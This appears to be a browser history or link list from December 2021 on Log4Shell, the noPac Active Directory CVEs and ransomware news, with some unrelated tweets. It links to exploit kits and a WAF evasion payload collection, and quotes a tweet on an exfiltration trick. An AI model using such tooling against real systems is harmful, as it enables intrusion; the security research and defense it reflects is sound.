Márcio Almeida on Twitter: "Just added support to LDAP Serialized Payloads in the JNDI-Exploit-Kit. This attack path works in *ANY* java version as long the classes used in the Serialized payload are in the application classpath. Do not rely on your java version being up-to-date and update your log4j ASAP! https://t.co/z3B2UolisR" / Twitter
https://twitter.com/marcioalm/status/1470361495405875200
GitHub - WazeHell/sam-the-admin: Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user
https://github.com/WazeHell/sam-the-admin
Zero-Day Exploit Targeting Popular Java Library Log4j
https://www.govcert.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j/
Diavol Ransomware
https://thedfirreport.com/2021/12/13/diavol-ransomware/
KB5008380—Authentication updates (CVE-2021-42287) - Microsoft Support
https://support.microsoft.com/en-us/topic/kb5008380-authentication-updates-cve-2021-42287-9dafac11-e0d0-4cb8-959a-143bd0201041
Now You Serial, Now You Don’t — Systematically Hunting for Deserialization Exploits | Mandiant
https://www.mandiant.com/resources/hunting-deserialization-exploits
eXploit – CVE-2021-42287/CVE-2021-42278 Weaponisation
https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html
一般社団法人日本ハッカー協会 on Twitter: "災害レベルと言われるlog4jの脆弱性に関して、実際に観測された攻撃や様々に難読化された攻撃パターン等、本来であれば広く共有されたほうが望ましいであろう情報が、日本国内では不正指令電磁的記録に該当するのではという懸念のため、公開、共有を躊躇しているというご意見を多く頂いております。" / Twitter
https://twitter.com/japanhackera/status/1470229222681878530
GitHub - fullhunt/log4j-scan: A fully automated, accurate, and extensive scanner for finding log4j RCE CVE-2021-44228
https://github.com/fullhunt/log4j-scan
「Log4j」の脆弱性を突く攻撃手段の情報共有は違法? 日本ハッカー協会に聞いた - ITmedia NEWS
https://www.itmedia.co.jp/news/articles/2112/13/news163.html
Tweet / Twitter
https://twitter.com/TinkerSec/status/1470411644153233409
Log4Shell attacks began two weeks ago, Cisco and Cloudflare say
https://therecord.media/log4shell-attacks-began-two-weeks-ago-cisco-and-cloudflare-say/
Will Dormann on Twitter: "@Laughing_Mantis Well that's terrifying. https://t.co/Sy3R4suwGK" / Twitter
https://twitter.com/wdormann/status/1470409556303958017?t=UOruiPMQpKtObRhf-bckNA&s=19
Greg Linares (Mantis) on Twitter: "#Log4J based on what I've seen, there is evidence that a worm will be developed for this in the next 24 to 48 hours. Self propagating with the ability to stand up a self hosted server on compromised endpoints. In addition to spraying traffic, dropping files, it will have c2c" / Twitter
https://twitter.com/Laughing_Mantis/status/1470165580736987137
The DFIR Report on Twitter: "Diavol Ransomware ➡️Initial Access: Zip->ISO loading BazarLoader ➡️Discovery: Net, Ping, AdFind, Advanced IP Scanner, ShareFinder ➡️C2: #CobaltStrike & #BazarLoader ➡️Lateral Movement: RDP, AnyDesk ➡️Exfil: FileZilla, ufile ➡️Impact: Diavol ransomware https://t.co/JWZGF83nqu" / Twitter
https://twitter.com/TheDFIRReport/status/1470373411218239488
What do you need to know about the log4j (Log4Shell) vulnerability? - YouTube
https://youtu.be/oC2PZB5D3Ys
TryHackMe | Solar, exploiting log4j
https://tryhackme.com/room/solar
Tom Anthony on Twitter: "Interesting Log4j payload I discovered, simply omit the closing brace }, and now you will potentially get a bunch of data exfiltrated to your server until the next } appears in that data. Had it work on a FANG target... https://t.co/1aR8yLcTbc" / Twitter
https://twitter.com/tomanthonyseo/status/1470374984749133825
GitHub - curated-intel/Log4Shell-IOCs: A collection of intelligence about Log4Shell and its exploitation activity.
https://github.com/curated-intel/Log4Shell-IOCs
The Cyber Startup Observatory - The Global Cyber Innovation Network
https://cyberstartupobservatory.com
Apache Log4j Vulnerability — Log4Shell — Widely Under Active Attack
https://thehackernews.com/2021/12/apache-log4j-vulnerability-log4shell.html
Arrest in Romania of a ransomware affiliate scavenging for sensitive data | Europol
https://www.europol.europa.eu/media-press/newsroom/news/arrest-in-romania-of-ransomware-affiliate-scavenging-for-sensitive-data
ThreatFox | log4j
https://threatfox.abuse.ch/browse/tag/log4j/
vx-underground
https://vx-underground.org
GitHub - silentsignal/burp-log4shell: Log4Shell scanner for Burp Suite
https://github.com/silentsignal/burp-log4shell
Ukraine arrests 51 for selling data of 300 million people in US, EU
https://www.bleepingcomputer.com/news/security/ukraine-arrests-51-for-selling-data-of-300-million-people-in-us-eu/
Log4j Detection and Response Playbook - TrustedSec
https://hubs.la/Q010JRCx0
Greg Linares (Mantis) on Twitter: "#log4j Update: IF YOU WERE DEPENDING ON JAVA VERSIONS TO PROTECT YOU FROM RCE INSTEAD OF DIRECTLY PATCHING LOG4J THAT IS NO LONGER A VIABLE MITIGATION STRATEGY *ALL* VERSIONS OF JAVA CAN NOW TRIGGER FULL RCE DUE TO A BYPASS PATCH LOG4J ASAP https://t.co/08Vk9pXBGN" / Twitter
https://twitter.com/Laughing_Mantis/status/1470412026119798786
GitHub - cube0x0/noPac: CVE-2021-42287/CVE-2021-42278 Scanner & Exploiter.
https://github.com/cube0x0/noPac
FBI - Tips
http://tips.fbi.gov
Capitol Violence — FBI
https://fbi.gov/wanted/capitol-violence
TrustedSec on Twitter: "Join us & @Binary_Defense for a #webcast on the latest news #log4j vulnerability TOMORROW at 2 p.m. EST! We will discuss how the vulnerability works with a quick demo, detecting attacks, & how you can respond with prevention or mitigation. https://t.co/vqDwrg98E9" / Twitter
https://twitter.com/TrustedSec/status/1470491609842262026
Releases · Neo23x0/Fenrir
https://github.com/Neo23x0/Fenrir/releases
Patch Now Apache Log4j Vulnerability Called Log4Shell Actively Exploited
https://research.trendmicro.com/3INubVV
GitHub’s response to Log4j vulnerability CVE-2021-44228 | The GitHub Blog
https://github.blog/2021-12-13-githubs-response-to-log4j-vulnerability-cve-2021-44228/
Log4Shell Hell: anatomy of an exploit outbreak – Sophos News
https://news.sophos.com/en-us/2021/12/12/log4shell-hell-anatomy-of-an-exploit-outbreak/
No Lie with Brian Tyler Cohen on Twitter: "JUST IN: An arena in South Dakota is holding a “Dash for Cash” where teachers get on their knees and fight for one dollar bills that they can use for classroom supplies while spectators watch and cheer. (h/t @AnnieTodd96) https://t.co/jIht84Ls9W" / Twitter
https://twitter.com/NoLieWithBTC/status/1470141286502080519
504 Gateway Time-out
https://blog.netlab.360.com/ten-families-of-malicious-samples-are-spreading-using-the-log4j2-vulnerability-now/
Ransomware attack shuts down computer systems for Virginia legislative agencies
https://richmond.com/news/state-and-regional/govt-and-politics/ransomware-attack-shuts-down-computer-systems-for-virginia-legislative-agencies/article_1603183b-cc58-5f2e-bad9-99693582b79c.html#tracking-source=home-top-story
Black Hills Information Security on Twitter: "We are doing an emergency newscast on the Log4Shell vulnerability. Today, 4:30pm ET -- https://t.co/B5EwWELEUF Why? Well, with most vulnerabilities it is simply an issue of "install the patch" — this one is different. How is this different? Let's have a chat to find out." / Twitter
https://twitter.com/BHinfoSecurity/status/1470412775063236622
sAMAccountName spoofing - The Hacker Recipes
https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing
Ransomware affiliate arrested in Romania
https://therecord.media/ransomware-affiliate-arrested-in-romania/
Log4j (CVE-2021-44228) RCE Vulnerability Explained - YouTube
https://www.youtube.com/watch?v=0-abhd-CLwQ
Error - PortSwigger
https://portswigger.net/bappstore/b011be53649346dd87276bca41ce8e8f
Hackers start pushing malware in worldwide Log4Shell attacks
https://www.bleepingcomputer.com/news/security/hackers-start-pushing-malware-in-worldwide-log4shell-attacks/
Collection of WAF evasion payloads · GitHub
https://gist.github.com/ZephrFish/32249cae56693c1e5484888267d07d39
Matthew Prince 🌥 on Twitter: "Earliest evidence we’ve found so far of #Log4J exploit is 2021-12-01 04:36:50 UTC. That suggests it was in the wild at least 9 days before publicly disclosed. However, don’t see evidence of mass exploitation until after public disclosure." / Twitter
https://twitter.com/eastdakota/status/1469800951351427073
Triage | Behavioral Report
https://tria.ge/211213-wjq52sead2/behavioral1
The #GCHQChristmasChallenge is here! - GCHQ.GOV.UK
https://www.gchq.gov.uk/news/christmas-card-2021
Microsoft Details Building Blocks of Widely Active Qakbot Banking Trojan
https://thehackernews.com/2021/12/microsoft-details-building-blocks-of.html
Webinar Not Available
https://attendee.gotowebinar.com/register/5384784947517148427
Log4Shell: Reconnaissance and post exploitation network detection – NCC Group Research
https://research.nccgroup.com/2021/12/12/log4shell-reconnaissance-and-post-exploitation-network-detection/